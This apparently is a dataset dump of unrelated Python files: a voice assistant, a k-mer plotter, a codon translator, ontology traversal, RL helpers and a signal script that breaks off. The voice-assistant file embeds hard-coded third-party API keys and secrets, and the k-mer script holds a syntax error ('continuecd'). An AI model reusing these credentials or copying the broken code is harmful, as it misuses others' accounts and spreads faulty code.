text stringlengths 8 6.05M |
|---|
# -*- coding: utf-8 -*-
"""
Created on Fri Feb 16 15:41:49 2018
@author: mynumber
功能:实现语音到文本,使用者说出一句话,讲说出的话识别成对应的文字
接口:speech_recognition ,百度语音识别api
实现过程:1、利用speech_recognition进行录音(可以检测录音开始和结束位置),并将录音转化为采样频率为16000,wav的格式
2、利用百度ResApi sdk 对 .wav格式的录音进行识别
接下来的工作:1、持续的输入输出
2、不将录音写到本地,直接进行识别
"""
import speech_recognition as sr
import time
import sys
# 引入Speech SDK
from aip import AipSpeech
import requests
import Netease
import get_news
# Chatbot API keys (NOTE(review): hard-coded credentials; move to config).
KEY = '8edce3ce905a4c1dbb965e6b35c3834d'  # 这个key可以直接拿来用 -> "this key can be used directly"
KEY1 = '56e5e786796241e7a7c97d0a55414f27'

# Send a request to the Tuling chatbot API.
def get_response(msg):
    """POST *msg* to the Tuling chatbot API and return its text reply.

    Returns None on network errors or malformed/non-JSON responses.
    """
    apiUrl = 'http://www.tuling123.com/openapi/api'
    data = {
        'key': KEY1,
        'info': msg,
        'userid': 'pth-robot',
    }
    try:
        r = requests.post(apiUrl, data=data).json()
        print(r)
        return r.get('text')
    except (requests.RequestException, ValueError, AttributeError):
        # Fixed: narrowed the bare except. .json() raises ValueError on a
        # non-JSON body; network failures derive from RequestException;
        # AttributeError covers a non-dict payload.
        return None
class speechRecognize(object):
    """Records one utterance from the microphone and transcribes it with
    the Baidu ASR REST API (via the `aip` SDK)."""

    def __init__(self,):
        # Baidu AIP credentials (NOTE(review): hard-coded secrets; move to config).
        self._APP_ID = '10686210'
        self._API_KEY = 'dVPvuaXf7Zgr7iNVrXRBz390'
        self._SECRET_KEY = '764e77ae416d3510cb87cf4c8d7082ee'
        self.aipSpeech = AipSpeech(self._APP_ID, self._API_KEY, self._SECRET_KEY)
        self.r = sr.Recognizer()

    def record_voice(self):
        """Record audio from the microphone and write it to speech1.wav,
        resampled to 16 kHz as required by the Baidu ASR endpoint."""
        with sr.Microphone() as source:
            # Calibrate for background noise so listen() detects utterance edges.
            self.r.adjust_for_ambient_noise(source)
            print('请开始讲话...')
            audio = self.r.listen(source)
        with open('speech1.wav', 'wb') as f:
            f.write(audio.get_wav_data(convert_rate=16000))
        self.start = time.time()  # start of the recognition timing window
        print('ending say')

    def recognize_record(self):
        """Send speech1.wav to Baidu ASR; return the result list or None."""
        def get_file_content(filePath):
            # Read the recorded WAV file as raw bytes.
            with open(filePath, 'rb') as fp:
                return fp.read()

        # 'lan' selects the recognition language ('zh' = Mandarin).
        response = self.aipSpeech.asr(get_file_content('speech1.wav'), 'wav', 16000, {'lan': 'zh',})
        self.end = time.time()
        try:
            if response['result'] is not None:
                print(response['result'])
                print('运行时间:%s' % (self.end - self.start))
                return response['result']
        except (KeyError, TypeError, AttributeError):
            # Fixed: narrowed the bare except. Error responses carry no
            # 'result' key (KeyError); self.start is unset if record_voice
            # was never called (AttributeError).
            return None
import win32com.client
"""
from win32com.client import gencache
gencache.EnsureModule('{C866CA3A-32F7-11D2-9602-00C04F8EE628}', 0, 5, 0)
"""
# Declare the win32com speech module reference and instantiate the speaker.
def speak(words=None):
    """Speak *words* aloud via the Windows SAPI text-to-speech COM interface."""
    try:
        speaker = win32com.client.Dispatch("SAPI.SPVOICE")
        speaker.Speak(words)
    except:
        # COM dispatch fails when SAPI is not registered on this machine.
        print('Error: 实例化失败 请检查是否设置好--IID{269316D8-57BD-11D2-9EEE-00C04F797396}')
# --- Script entry: voice-assistant command loop ---
A = speechRecognize()
netmusic = Netease.NetEaseMusic()
news = get_news.News()
while True:
    A.record_voice()
    msg = A.recognize_record()  # list of recognized strings, or None
    if msg is not None:
        if '播放' in msg[0]:  # "play <song>"
            speak('正在搜索中')
            print('音乐信息:%s' % msg[0])
            song = msg[0].split('播放')[1]
            netmusic.play_song(song)
        elif '退出系统' in msg[0]:  # "exit system"
            print('即将退出系统')
            sys.exit(0)
        elif '新闻' in msg[0]:  # "news": read out the top headline
            n = news.get_news(type_='top')
            speak(n[0]['title'])
            print(n[0]['title'])
        elif '暂停' in msg[0]:  # "pause"
            netmusic.pause_music()
        elif '继续' in msg[0]:  # "resume"
            netmusic.unpause_music()
        else:
            # Fixed: pass the recognized text (msg[0]) rather than the whole
            # result list -- the chatbot API's 'info' field expects a string,
            # and every other branch above uses msg[0].
            response = get_response(msg[0])
            netmusic.pause_music()  # duck the music while speaking the reply
            speak(response)
            netmusic.unpause_music()
    time.sleep(0.1)
|
#!/usr/bin/python3
# Resolve a hostname to its IPv4 address via DNS and print it.
import socket
ip = socket.gethostbyname('www.arshadsiddiqui.in')
print (ip)
|
#!/usr/bin/python
import sys
import getopt
import matplotlib
import numpy as np
matplotlib.use("Agg") # Force matplotlib to not use Xwindows backend.
import matplotlib.pyplot as plt
# Default run parameters (overridden by the command-line flags parsed below).
kmer = 11            # -k: k-mer size
file_name = ""       # -f: input file path
xmax = 2000          # -x: x-axis maximum for the plot
file_type = "fasta"  # -t: "fasta" or "fastq"
bar_stat = 0         # -p: progress bar flag (0/1)
bar_Y_N = "Off"      # human-readable mirror of bar_stat
output_dir = "./"    # -d: output directory
argv = sys.argv[1:]
try:
    opts, args = getopt.getopt(argv, "hpk:x:f:t:d:")
except getopt.GetoptError:
    # Unknown flag: show usage and exit with status 2 (CLI-misuse convention).
    print 'kspec.py -k <kmer_size> -x <x_axis_max> -t <type>[fasta|fastq] -p[progress bar on] -d <output_dir> [./] -f <inputfile> \n'
    sys.exit(2)
# Apply command-line flags; values arrive as strings and are cast where used.
for opt, arg in opts:
    if opt == '-h':
        print "#--- K-mer frequency graphing script ---#\n"
        print "Usage:"
        print 'kspec.py -k <kmer_size> -x <x_axis_max> -t <type>[fasta|fastq] -p[progress bar on] -d <output_dir> [./] -f <inputfile> \n'
        print "Goals:"
        print "1) Take in fastq file and kmerize it and output kmer occurence frequnecy"
        print "2) Output graph of kmer occurence frequnecy"
        print "3) Output kmer occurence frequnecy to .tsv file"
        print "\n"
        sys.exit()
    elif opt in ("-k"):
        kmer = arg
    elif opt in ("-x"):
        xmax = arg
    elif opt in ("-f"):
        file_name = arg
    elif opt in ("-t"):
        file_type = arg
    elif opt in ("-p"):
        # -p takes no value; just switch the progress bar on.
        bar_stat = 1
        bar_Y_N = "On"
    elif opt in ("-d"):
        output_dir = arg
# Echo the effective run parameters back to the user.
print "#-----------------------------------------------------------------------#"
print "#--- K-mer frequency graphing script RUN PARAMETERS---#\n"
print "Input file:", file_name
print "Input file type:", file_type
print "Kmer size:", kmer
print "X-axis max kmer count:", xmax
print "Progress Bar:", bar_Y_N
print "Output Dir:", output_dir
print " "
###############################################################################
# Progress bar is not my own work from:
# https://gist.github.com/vladignatyev/06860ec2040cb497f0f3
#
def progress(count, total, suffix=''):
    """Draw a simple in-place console progress bar (carriage-return style)."""
    width = 60
    done = int(round(width * count / float(total)))
    pct = round(100.0 * count / float(total), 1)
    meter = '=' * done + '-' * (width - done)
    sys.stdout.write('[%s] %s%s ...%s\r' % (meter, pct, '%', suffix))
    sys.stdout.flush()
##################################################
# Dictionary storing kmers
kmer_dic = {}
# importing file
in_file = file_name
fh1 = open(in_file, 'r')
# Count number of lines in a file
num_lines = sum(1 for line in fh1)
fh1.close
if num_lines >= 100000:
print "Your file has %s number of lines..." % (num_lines)
print "This may take a while to process..."
print "...so be patience..."
print " "
fh2 = open(in_file, 'r')
# skip first line
next(fh2)
seq_total = ""
count = 0
kmer_range = 0
# K-merize fastq input: every 4th line (the sequence line of each record).
if str(file_type) == "fastq":
    print "K-merizing the reads..."
    for line in fh2:
        if bar_stat == 1:
            progress(count, num_lines, suffix='done')
        count = count + 1
        if count % 4 == 1:
            # strip new line char
            line = line.strip('\n')
            # determine range of kmer
            line_length = len(line)
            kmer_range = line_length - int(kmer) + 1
            # Starting kmer parsing 0 to length of line minus kmer size
            for kmer_start_index in range(kmer_range):
                # range for kmer
                kmer_end_index = kmer_start_index + int(kmer)
                # collect khmer for this iteraton
                kmer_string = line[kmer_start_index: kmer_end_index]
                # check for kmer in dictionary and ++ if not present add to dic and equal 1
                kmer_dic[kmer_string] = kmer_dic.get(kmer_string, 0) + 1
elif file_type == "fasta":
for line in fh2:
if bar_stat == 1:
progress(count, num_lines, suffix='done')
if line[0] != ">":
line = line.strip('\n')
seq_total = seq_total + line
count += 1
continue
elif line[0] == ">":
# determine range of kmer
line_length = len(seq_total)
kmer_range = line_length - int(kmer) + 1
# Starting kmer parsing 0 to length of line minus kmer size
for kmer_start_index in range(kmer_range):
# range for kmer
kmer_end_index = kmer_start_index + int(kmer)
# collect khmer for this iteraton
kmer_string = seq_total[kmer_start_index: kmer_end_index]
# check for kmer in dictionary and ++ if not present add to dic and equal 1
kmer_dic[kmer_string] = kmer_dic.get(kmer_string, 0) + 1
count += 1
seq_total = ""
continuecd
# Derive the output file stem from the input path (basename, extension cut).
file_name_out = file_name.split('/')
file_name_split = file_name_out[-1]
# Write raw per-kmer counts as a TSV file.
file_out = str(output_dir) + "%s_raw_kmer_data_Ksize_%s.tsv" % (file_name_split[:-6], kmer)
fh_out = open(file_out, 'w')
fh_out.write("K-mer\tNumber of K-mers\n")
for key in kmer_dic.keys():
    fh_out.write("%s\t%s\n" % (key, kmer_dic[key]))
fh_out.close()  # fixed: was "fh_out.close" (no parens) -- file never flushed/closed
# khmer freq dictionary
kmer_dic_freq = {}
# count the number of count of kmers
for val in kmer_dic.values():
kmer_dic_freq[val] = kmer_dic_freq.get(val, 0) + 1
print " "
print "#-----------------------------------------------------------------------#"
list_of_kmer_occurences = []
list_of_kmer_occurences.append([])
list_of_kmer_occurences.append([])
# Print out list of counts of count of K-mers
print "K-mer Frequency Number of K-mers in this category"
for key in sorted(kmer_dic_freq.keys()):
print key, " ", kmer_dic_freq[key]
list_of_kmer_occurences[0].append(key)
list_of_kmer_occurences[1].append(kmer_dic_freq[key])
print " "
print "#-----------------------------------------------------------------------#"
# Open file for writing
file_out = str(output_dir) + "%s_kmer_freq_data_Ksize_%s.tsv" % (file_name_split[:-6], kmer)
fh_out = open(file_out, 'w')
print "Writing to: file_out"
fh_out.write("K-mer Frequency\tNumber of K-mers in this category\n")
for key in sorted(kmer_dic_freq.keys()):
fh_out.write("%s\t%s\n" % (key, kmer_dic_freq[key]))
fh_out.close
# Plot the k-mer frequency histogram (log-scaled y axis) and save it as PNG.
print "Graphing Kmers..."
plt.bar(kmer_dic_freq.keys(), kmer_dic_freq.values(), edgecolor="none", width=1.0, log=True)
plt.xlim(0, int(xmax))
plt.xlabel('Number of K-mers')
plt.ylabel('Number of Appearances')
plt.title('Counts of the number of Kmer Occurences')
# Annotation position is hand-tuned relative to the x-axis limit.
plt.annotate('K-mer size = %s' % (kmer), xy=(1, 3), xytext=((int(xmax)- 489), 21))
plt.grid(True)
print "\nPrinting to %s%s_kmer_freq_hist_Ksize_%s.png" % (output_dir, file_name_split[:-6], kmer)
# Save first graph
plt.savefig(str(output_dir) + "%s_kmer_freq_hist_Ksize_%s.png" % (file_name_split[:-6], kmer))
plt.close()
|
import math
import torch
def delphineat_gauss_activation(z):
    """Gauss activation as defined by SharpNEAT, also used in DelphiNEAT."""
    scaled = z * 2.5
    return 2 * math.exp(-(scaled ** 2)) - 1
def delphineat_sigmoid_activation(z):
    """DelphiNEAT sigmoid: the logistic function rescaled to (-1, 1)."""
    logistic = 1.0 / (1.0 + math.exp(-z * 5))
    return 2.0 * logistic - 1
def delphineat_gauss_torch_activation(z):
    """PyTorch version of the SharpNEAT/DelphiNEAT Gauss activation."""
    scaled = z * 2.5
    return 2.0 * torch.exp(-(scaled ** 2)) - 1
def delphineat_sigmoid_torch_activation(z):
    """PyTorch version of the DelphiNEAT sigmoid, rescaled to (-1, 1)."""
    logistic = 1.0 / (1.0 + torch.exp(-z * 5))
    return 2.0 * logistic - 1
# -*- coding: utf-8 -*-
class Systems:
    """Read-only accessor for rows of the ``systems.systems`` table."""

    def listSystems(self, con):
        """Fetch all systems through *con* (a DB-API connection) as dicts."""
        cursor = con.cursor()
        cursor.execute('select id,name,config from systems.systems')
        return [self.convertToDict(row) for row in cursor.fetchall()]

    def convertToDict(self, r):
        """Map an (id, name, config) row tuple to a dict."""
        return {
            'id': r[0],
            'name': r[1],
            'config': r[2],
        }
|
#!/usr/bin/python3
'''JSON module'''
import json
def load_from_json_file(filename):
    """Deserialize the JSON file *filename* and return the resulting object."""
    with open(filename) as handle:
        return json.load(handle)
|
#!/usr/bin/python3
def is_same_class(obj, a_class):
    """Return True only when *obj* is exactly an instance of *a_class*
    (subclasses do not count)."""
    # Fixed idiom: "True if ... else False" around a boolean is redundant,
    # and identity (`is`) is the correct comparison for type objects.
    return type(obj) is a_class
|
from tkinter import filedialog, Tk
import re
from math import log10
def translate(seq):
    """Translate a DNA string into a one-letter protein sequence.

    Uses the module-level ``codon`` and ``aacode`` tables; translation stops
    at the first stop codon, and trailing bases (len % 3) are ignored.
    """
    residues = []
    usable = len(seq) - len(seq) % 3
    for start in range(0, usable, 3):
        amino = codon[seq[start:start + 3]]
        if amino == "Stop":
            break
        residues.append(aacode[amino])
    return "".join(residues)
def printSeq(S):
    """Print sequence *S* in 20-character lines.

    (The original wrapped the print in try/except IndexError, but slicing
    never raises IndexError, so the guard was dead code.)
    """
    rows = int(len(S) / 20) + 1
    for row in range(rows):
        print(S[row * 20:(row + 1) * 20])
def Tm(seq):
    """Melting temperature (degrees C) at 10^-2 M Na+ from the GC fraction.

    Tm = Xgc * 41.1 + 16.6 * log10([Na+]) + 81.5
    """
    Xcg = len(re.findall("[GC]", seq)) / len(seq)
    Tm = Xcg * 41.1 + 16.6 * log10(10 ** (-2)) + 81.5
    return Tm

def maxTm(seq):
    """Best-case Tm after synonymous third-base substitutions.

    For every codon whose third base is not already C or G, substitute a C
    (or G) third base when the substitution encodes the same amino acid in
    the module-level ``codon`` table, then return Tm of the altered sequence.
    """
    seqSplit = [seq[3 * i:3 * i + 3] for i in range(int(len(seq) / 3))]
    for s in range(len(seqSplit)):
        # Fixed: the original compared against ("C" or "G"), which evaluates
        # to just "C", so codons already ending in G were still "optimized"
        # (harmless for the Tm value, since a G->C swap keeps the GC count,
        # but wrong logic nonetheless).
        if seqSplit[s][2] in ("C", "G"):
            continue
        if codon[seqSplit[s]] == codon[seqSplit[s][0:2] + "C"]:
            seqSplit[s] = seqSplit[s][0:2] + "C"
        elif codon[seqSplit[s]] == codon[seqSplit[s][0:2] + "G"]:
            seqSplit[s] = seqSplit[s][0:2] + "G"
    return Tm("".join(seqSplit))
# Standard genetic code: codon -> three-letter amino-acid name (or "Stop").
codon = {"TTT" : "Phe", "TTC" : "Phe", "TTA" : "Leu", "TTG" : "Leu",
         "CTT" : "Leu", "CTC" : "Leu", "CTA" : "Leu", "CTG" : "Leu",
         "ATT" : "Ile", "ATC" : "Ile", "ATA" : "Ile", "ATG" : "Met",
         "GTT" : "Val", "GTC" : "Val", "GTA" : "Val", "GTG" : "Val",
         "TCT" : "Ser", "TCC" : "Ser", "TCA" : "Ser", "TCG" : "Ser",
         "CCT" : "Pro", "CCC" : "Pro", "CCA" : "Pro", "CCG" : "Pro",
         "ACT" : "Thr", "ACC" : "Thr", "ACA" : "Thr", "ACG" : "Thr",
         "GCT" : "Ala", "GCC" : "Ala", "GCA" : "Ala", "GCG" : "Ala",
         "TAT" : "Tyr", "TAC" : "Tyr", "TAA" : "Stop", "TAG" : "Stop",
         "CAT" : "His", "CAC" : "His", "CAA" : "Gln", "CAG" : "Gln",
         "AAT" : "Asn", "AAC" : "Asn", "AAA" : "Lys", "AAG" : "Lys",
         "GAT" : "Asp", "GAC" : "Asp", "GAA" : "Glu", "GAG" : "Glu",
         "TGT" : "Cys", "TGC" : "Cys", "TGA" : "Stop", "TGG" : "Trp",
         "CGT" : "Arg", "CGC" : "Arg", "CGA" : "Arg", "CGG" : "Arg",
         "AGT" : "Ser", "AGC" : "Ser", "AGA" : "Arg", "AGG" : "Arg",
         "GGT" : "Gly", "GGC" : "Gly", "GGA" : "Gly", "GGG" : "Gly"}
# Three-letter amino-acid name -> one-letter code.
aacode = {"Ala" : "A", "Arg" : "R", "Asn" : "N", "Asp" : "D", "Cys" : "C",
          "Gln" : "Q", "Glu" : "E", "Gly" : "G", "His" : "H", "Ile" : "I",
          "Leu" : "L", "Lys" : "K", "Met" : "M", "Phe" : "F", "Pro" : "P",
          "Ser" : "S", "Thr" : "T", "Trp" : "W", "Tyr" : "Y", "Val" : "V"}
# --- Script entry: pick a FASTA file and report sequence statistics. ---
root = Tk()
root.filename = filedialog.askopenfilename(initialdir="D:/강의 관련/'18년 2학기/생화학1/과제/1",
    title="Choose your file", filetypes=(("FASTA files","*.fasta"), ("all files","*.*")))
print(root.filename)
root.withdraw()
# Concatenate all non-header lines into one sequence string.
seq = ""
with open(root.filename, 'r') as fasta_file:  # fixed: file was never closed
    for i in fasta_file.read().splitlines():
        try:
            if i[0] == '>':
                print(i); continue
            else:
                seq += i
        except IndexError:
            # Blank line: i[0] raises IndexError; just skip it.
            pass
print("Sequence length : %dbp" % len(seq))
print("Translated Protein length : %daa" % len(translate(seq)))
print("Thermal denaturation (Tm) at 10^-2M [Na+] : %.2f'C" % Tm(seq))
print("Max thermal Tm at 10^-2M [Na+] : %.2f'C" % maxTm(seq))
a = input("Do you want to see all protein sequences? (y/n) [n]")
# Fixed: the original compared a == ('y' or 'Y'), which evaluates to
# a == 'y', so an upper-case answer was silently ignored.
if a in ('y', 'Y'):
    printSeq(translate(seq))
elif a in ('n', 'N', ''):
    pass
input()
|
from owlready2 import *
class Network:
    """ A class which runs a depth-first-search on the ontology and creates
    a graph network from the data.
    Parameters
    ----------
    ontology : OWL2 climate mind ontology file
        Completes a depth-first search for the ontology and return edges in
        the component reachable from source.
    """
    def __init__(self, ontology, source=None):
        self.ontology = ontology
        self.result = []        # (parent_label, child_label, edge_type) triples
        self.visited = set()    # nodes already expanded
        self.node_family = []   # DFS stack of (parent, child-iterator, edge_type)
        self.class_family = []  # DFS stack for parent-class exploration
        if source:
            self.source = source
        else:
            self.source = None
        # Alias every property so it can be read with plain attribute access.
        obj_props = list(self.ontology.object_properties())
        self.obj_properties = self.make_alias_names_for_properties(obj_props)
        annot_props = list(self.ontology.annotation_properties())
        self.annot_properties = self.make_alias_names_for_properties(annot_props)

    def give_alias(self, property_object):
        """ Adds labels the ontology object in a way that makes them pythonicly accessible through . invocation method.
        Parameters
        ----------
        property_object: ontology property object to make pythonicly accessible
        """
        label_name = property_object.label[0]  # assumes every property has at least one label -- TODO confirm
        label_name = label_name.replace("/","_or_")
        label_name = label_name.replace(" ","_")
        label_name = label_name.replace(":","_")
        property_object.python_name = label_name
        return label_name

    def make_alias_names_for_properties(self, properties):
        """ Aliases each property in *properties* via give_alias.
        Parameters
        ----------
        properties: list of ontology property objects to make pythonicly accessible
        Returns the list of alias names now usable with getattr().
        """
        new_names = [self.give_alias(x) for x in properties]
        return new_names

    def add_child_to_result(self, child, parent, edge_type):
        """ Adds a node to the results and if needed adds the node's family
        to node_family (a stack of nodes to continue exploring).
        Parameters
        ----------
        child: A node in the ontology
        parent: A node in the ontology
        edge_type: The relationship between child and parent
                   i.e. causes, inhibits, etc
        """
        self.result.append((parent.label[0], child.label[0], edge_type))
        if child not in self.visited:
            self.visited.add(child)
            for obj_prop in self.obj_properties:
                # Fixed: getattr replaces eval() on a built string -- same
                # attribute lookup without executing assembled code.
                self.node_family.append((
                    child,
                    iter(getattr(child, obj_prop)),
                    obj_prop
                ))

    def add_class_to_explore(self, class_name):
        """ Adds all nodes related to a particular class. Some of these nodes
        will not actually be a class, but that is irrelevant as they will get ignored.
        Parameters
        ----------
        class_name: A node in the ontology
        """
        for obj_prop in self.obj_properties:
            try:
                self.class_family.append((
                    class_name,
                    iter(getattr(class_name, obj_prop)),  # fixed: getattr instead of eval
                    obj_prop
                ))
            except Exception:
                # Best-effort: not every property exists on every entity.
                pass
        try:
            self.class_family.append((
                class_name,
                iter(self.ontology.get_parents_of(class_name)),
                "is_a"
            )) # the class(es) of the ont_class. This could pull classes that are just Restriction classes, so really should add code here that checks the class is found in self.ontology.classes() before adding it to the class_family.
        except Exception:
            pass

    def dfs_for_classes(self, node):
        """ Performs a depth-first-search on parent classes from a node.
        Parameters
        ----------
        node: The starting point node in the ontology
        """
        visited_classes = set()
        classes = self.ontology.get_parents_of(node)
        if classes:
            for ont_class in classes:
                if ont_class != owl.Thing:
                    self.add_class_to_explore(ont_class)
            while self.class_family:
                parent2, children2, edge_type2 = self.class_family[-1]
                visited_classes.add(parent2) #these are not all classses
                try:
                    child2 = next(children2)
                    if child2 != owl.Thing:
                        if child2 in self.ontology.individuals():
                            self.add_child_to_result(child2, node, edge_type2)
                        elif child2 not in visited_classes and child2 in self.ontology.classes():
                            visited_classes.add(child2)
                            self.add_class_to_explore(child2)
                except StopIteration:
                    # Iterator exhausted: pop the frame (emulated recursion).
                    self.class_family.pop()

    def dfs_labeled_edges(self):
        """ Produce edges in a depth-first-search (DFS) labeled by type.
        Notes
        -----
        Based on http://www.ics.uci.edu/~eppstein/PADS/DFS.py
        by D. Eppstein, July 2004.
        If a source is not specified then a source is chosen arbitrarily and
        repeatedly until all components in the graph are searched.
        TODO Find why a couple of duplicates are created
        Example: increase in carbon capture,
                 greenhouse-gas externality,
                 is_inhibited_or_prevented_or_blocked_or_slowed_by
        """
        if self.source:
            nodes = [self.ontology.search_one(label=self.source)]
        else:
            nodes = self.ontology.individuals()
        for node in nodes:
            if node not in self.visited:
                self.visited.add(node)
                for obj_prop in self.obj_properties:
                    self.node_family.append((
                        node,
                        iter(getattr(node, obj_prop)),  # fixed: getattr instead of eval
                        obj_prop
                    ))
                while self.node_family:
                    parent, children, edge_type = self.node_family[-1]
                    self.visited.add(parent)
                    try:
                        child = next(children)
                        self.add_child_to_result(child, parent, edge_type)
                    except StopIteration:
                        self.node_family.pop()
                        self.dfs_for_classes(parent)

    def get_results(self):
        """ Returns
        -------
        result: A list of triples found by the depth-first-search
        """
        return self.result
|
import numpy as np
import torch
import torch.optim as optim
import torch.nn as nn
import torch.nn.functional as F
from scipy import signal
import gym
from gym import wrappers
import math
import scipy
import matplotlib.pyplot as plt
from matplotlib import animation
from typing import Optional
# ANSI SGR foreground color codes, keyed by color name.
color2num = dict(
    gray=30,
    red=31,
    green=32,
    yellow=33,
    blue=34,
    magenta=35,
    cyan=36,
    white=37,
    crimson=38,
)

def colorize(
    string: str,
    color: str,  # fixed annotation: keys of color2num are strings, not ints
    bold: bool = False,
    highlight: bool = False,
) -> str:
    """
    Colorize a string with ANSI escape codes.
    This function was originally written by John Schulman.

    Args:
        string: Text to wrap in escape codes.
        color: A key of ``color2num`` (e.g. "red").
        bold: Also apply the bold attribute.
        highlight: Use the background (highlight) variant of the color.
    """
    attr = []
    num = color2num[color]
    if highlight:
        num += 10  # background colors are offset by 10 from foreground
    attr.append(str(num))
    if bold:
        attr.append("1")
    return "\x1b[%sm%s\x1b[0m" % (";".join(attr), string)
def calc_logstd_anneal(n_anneal_cycles: int, anneal_start: float, anneal_end: float, epochs: int) -> np.ndarray:
    """
    Calculate log standard deviation annealing schedule. Can be used in PG algorithms on continuous action spaces.

    Args:
        n_anneal_cycles (int): How many times to cycle from anneal_start to anneal_end over the training epochs.
        anneal_start (float): Starting log standard deviation value.
        anneal_end (float): Ending log standard deviation value.
        epochs (int): Number of training cycles.
    """
    if n_anneal_cycles > 0:
        ramp = np.linspace(anneal_start, anneal_end, num=epochs // n_anneal_cycles)
        # Doubling the array n times is the same as tiling it 2**n times.
        return np.tile(ramp, 2 ** n_anneal_cycles)
    return np.linspace(anneal_start, anneal_end, num=epochs)
class NetworkUtils:
    """
    Random utilities for neural networks.
    """

    def __init__(self):
        super().__init__()

    def conv2d_output_size(self, kernel_size, stride, sidesize):
        """Side length of a square conv2d output (no padding, no dilation)."""
        return (sidesize - (kernel_size - 1) - 1) // stride + 1

    def squared_error_loss(self, target, actual):
        """Elementwise squared error between prediction and target."""
        return (actual - target) ** 2
def save_frames_as_gif(frames, filename=None):
    """
    Save a list of frames as a gif
    This code from this floydhub blog post: https://blog.floydhub.com/spinning-up-with-deep-reinforcement-learning/
    """
    # patch = plt.imshow(frames[0])
    fig = plt.figure()
    plt.axis("off")
    # NOTE(review): `animate` references the undefined name `patch` (its
    # definition is commented out above); it is dead code because the
    # FuncAnimation call below is also commented out and ArtistAnimation
    # is used instead.
    def animate(i):
        patch.set_data(frames[i])
    # anim = animation.FuncAnimation(plt.gcf(), animate, frames = len(frames), interval=50)
    anim = animation.ArtistAnimation(fig, frames, interval=50)
    if filename:
        anim.save(filename, writer="imagemagick")
class NormalizedActions(gym.ActionWrapper):
    """
    Normalize actions for continuous policy
    From here: https://github.com/JamesChuanggg/pytorch-REINFORCE/blob/master/normalized_actions.py
    """
    def _action(self, action):
        # Map a policy output in [-1, 1] to the env's [low, high] range.
        action = (action + 1) / 2  # [-1, 1] => [0, 1]
        action *= self.action_space.high - self.action_space.low
        action += self.action_space.low
        return action

    def _reverse_action(self, action):
        # Inverse of _action: map an env action in [low, high] back to [-1, 1].
        action -= self.action_space.low
        action /= self.action_space.high - self.action_space.low
        action = action * 2 - 1
        return action
def _discount_cumsum(x: np.array, discount: float):
"""
magic from rllab for computing discounted cumulative sums of vectors.
input:
vector x,
[x0,
x1,
x2]
output:
[x0 + discount * x1 + discount^2 * x2,
x1 + discount * x2,
x2]
"""
return scipy.signal.lfilter([1], [1, float(-discount)], x[::-1], axis=0)[::-1]
def conv2d_output_size(kernel_size, stride, sidesize):
    """Side length of a square conv2d output (no padding, no dilation)."""
    shrunk = sidesize - kernel_size
    return shrunk // stride + 1
def num2tuple(num):
    """Pass tuples through unchanged; duplicate a scalar into an (h, w) pair."""
    return num if isinstance(num, tuple) else (num, num)

def conv2d_output_shape(h_w, kernel_size=1, stride=1, pad=0, dilation=1):
    """(h, w) output shape of a Conv2d layer; arguments may be ints or pairs.

    `pad` may be given per-side, so it is normalized to a pair of pairs and
    summed per dimension.
    """
    h_w, kernel_size, stride, pad, dilation = num2tuple(h_w), \
        num2tuple(kernel_size), num2tuple(stride), num2tuple(pad), num2tuple(dilation)
    pad = num2tuple(pad[0]), num2tuple(pad[1])
    h = math.floor((h_w[0] + sum(pad[0]) - dilation[0]*(kernel_size[0]-1) - 1) / stride[0] + 1)
    w = math.floor((h_w[1] + sum(pad[1]) - dilation[1]*(kernel_size[1]-1) - 1) / stride[1] + 1)
    return h, w

def convtransp2d_output_shape(h_w, kernel_size=1, stride=1, pad=0, dilation=1, out_pad=0):
    """(h, w) output shape of a ConvTranspose2d layer; args may be ints or pairs.

    Fixed: the original referenced the undefined name ``dialation`` and
    therefore raised NameError on every call.
    """
    h_w, kernel_size, stride, pad, dilation, out_pad = num2tuple(h_w), \
        num2tuple(kernel_size), num2tuple(stride), num2tuple(pad), num2tuple(dilation), num2tuple(out_pad)
    pad = num2tuple(pad[0]), num2tuple(pad[1])
    h = (h_w[0] - 1)*stride[0] - sum(pad[0]) + dilation[0]*(kernel_size[0]-1) + out_pad[0] + 1
    w = (h_w[1] - 1)*stride[1] - sum(pad[1]) + dilation[1]*(kernel_size[1]-1) + out_pad[1] + 1
    return h, w
# -*- coding: utf-8 -*-
"""
Created on Wed Jun 5 10:56:12 2019
@author: Administrator
"""
import numpy as np
import rcos
from scipy import signal
import matplotlib.pyplot as plt
# Samples per chip for the pulse-shaping upsampler.
SPS = 32
#PN_CODE = np.array([1,1,1,1,1,0,0,1,1,0,1,0,1])#BARK CODE[1, 0, 0, 0, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 1]
# PN_CODE = np.array([1, 0, 0, 0, 0, 0, 1, 1, 1, 1, 0, 0, 1, 0, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 0, 1, 0, 0, 0, 1, 0, 1, 1, 0, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1, 0, 0, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1])
# Pseudo-noise spreading code (alternative codes above/below kept for experiments).
PN_CODE = np.array([1, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 0, 1, 0, 0, 1, 1, 0, 0, 1, 1, 1, 0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 1, 0, 1, 1, 0, 1, 0, 1, 1, 0, 1, 1, 0, 0, 1, 0, 0, 1, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1, 1, 1, 0, 0, 1, 0, 1, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 1, 1, 1, 1, 0, 0, 0, 1, 0, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0])
# PN_CODE = np.array([1, 0, 0, 0, 0, 1, 1, 1, 0, 0, 1, 1, 0, 1, 1, 1, 1, 1, 0, 1, 0, 0, 0, 1, 0, 0, 1, 0, 1, 0, 1])
#PN_CODE = np.array([1, 0, 0, 0, 0, 1, 0, 0, 1, 0, 1, 1, 0, 0, 1, 1, 1, 1, 1, 0, 0, 0, 1, 1, 0, 1, 1, 1, 0, 1, 0])
# Map the {0, 1} code to bipolar {-1, +1} chips.
PN_CODE = (PN_CODE-0.5)*2
print("pn code len:%d" % PN_CODE.shape[0])
# Generate the random bipolar baseband symbol sequence.
base_sig = (np.random.randint(0,2,6)-0.5)*2
# Impulse-upsampled copy of the baseband (scaled for plotting reference).
